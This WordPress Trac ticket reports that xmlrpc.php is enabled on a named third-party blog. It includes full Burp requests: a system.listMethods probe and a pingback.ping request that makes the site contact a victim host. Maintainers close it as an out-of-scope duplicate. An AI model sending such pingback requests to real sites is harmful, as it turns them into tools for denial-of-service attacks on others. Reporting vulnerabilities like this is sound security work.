Make WordPress Core

Opened 5 years ago

Closed 5 years ago

Last modified 5 years ago

#47551 closed defect (bug) (duplicate)

xmlrpc.php FILE is enable .It can be used for bruteforce attack and denial of service

Reported by: pranayjain2511's profile pranayjain2511 Owned by: marybaum's profile marybaum
Milestone: Priority: normal
Severity: normal Version: 5.0.1
Component: XML-RPC Keywords:
Focuses: Cc:

Description (last modified by SergeyBiryukov)

https://blog.optimizely.com/ is wordpress site

Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The website https://blog.optimizely.com/ has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts.
In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below.

POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597; ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759; ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22; OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false; _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-login1-everyone; marketo_utm_medium=referral; marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-optimizely.com-1560333355657-34661; amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=; _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980; _gid=GA1.2.871921774.1560541163; sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D; amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 93

<methodCall>
<methodName>system.listMethods</methodName>
<params>
</params>
</methodCall>

Notice that a successful response is received showing that the xmlrpc.php file is enabled.
Now, considering the domain https://blog.optimizely.com, the xmlrpc.php file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below.

As soon as the above request is sent, the victim host (http://hackersera.com) gets an entry in its log file with a request originating from the https://blog.optimizely.com domain verifying the pingback.

remediation:

If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.

thanks

note: screenshots are given below

http request

POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597; ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759; ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22; OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false; _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-login1-everyone; marketo_utm_medium=referral; marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-optimizely.com-1560333355657-34661; amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=; _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980; _gid=GA1.2.871921774.1560541163; sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D; amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 234

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://hackersera.com</string></value></param>
<param><value><string>https://blog.optimizely.com</string></value></param>
</params>
</methodCall>

NOte : Please find attachments for POc In the following URL : https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn

Change History (4)

#1 @marybaum
5 years ago

  • Keywords possible-vulnerability added
  • Priority changed from normal to high
  • Severity changed from normal to major

Welcome, and thanks for submitting!

Here's some info about reporting vulnerabilities: https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/

I am going to close this ticket and ask you to report the issue to Hacker One, re those instructions, and ask some other people for their input as well.

Last edited 5 years ago by marybaum (previous) (diff)

#2 @marybaum
5 years ago

  • Owner set to timothyblynjacobs
  • Status changed from new to reviewing

#3 @marybaum
5 years ago

  • Owner changed from timothyblynjacobs to marybaum
  • Status changed from reviewing to accepted

#4 @SergeyBiryukov
5 years ago

  • Description modified (diff)
  • Keywords needs-patch possible-vulnerability removed
  • Milestone Awaiting Review deleted
  • Priority changed from high to normal
  • Resolution set to duplicate
  • Severity changed from major to normal
  • Status changed from accepted to closed

Hi @pranayjain2511, welcome to WordPress Trac!

A DoS (Denial of Service) against xmlrpc.php is no different to one against the homepage or wp-login.php, preventing it is out of scope for WordPress. Caching and security plugins often attempt to cover this well, but ultimately it's a issue that needs to be handled at the server level.

See #35532, #36806, #24193, and other similar tickets.

Additionally, when writing this ticket you should have seen this notice:

Do not report potential security vulnerabilities here.
See the Security FAQ and visit the WordPress HackerOne program.

Last edited 5 years ago by SergeyBiryukov (previous) (diff)
Note: See TracTickets for help on using tickets.